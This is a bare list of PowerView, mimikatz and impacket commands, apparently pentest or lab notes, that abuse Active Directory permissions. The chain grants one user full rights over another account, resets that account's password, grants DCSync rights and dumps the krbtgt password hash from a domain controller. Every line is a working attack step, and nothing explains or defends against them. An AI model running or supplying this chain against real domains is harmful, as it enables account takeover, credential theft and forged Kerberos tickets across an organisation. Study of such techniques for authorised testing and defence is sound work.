Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}
Add-DomainObjectAcl -TargetIdentity sieng.chantrea -PrincipalIdentity khan.chanthou -Rights All
Get-ObjectAcl -Identity sieng.chantrea -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}
net user sieng.chantrea Password123 /domain
Add-DomainObjectAcl -TargetIdentity Object_Name -PrincipalIdentity khan.chanthou -Rights DCSync
mimikatz# lsadump::dcsync /user:krbtgt
impacket-secretsdump -just-dc-user krbtgt vulnableone/sqlsvc@10.10.10.10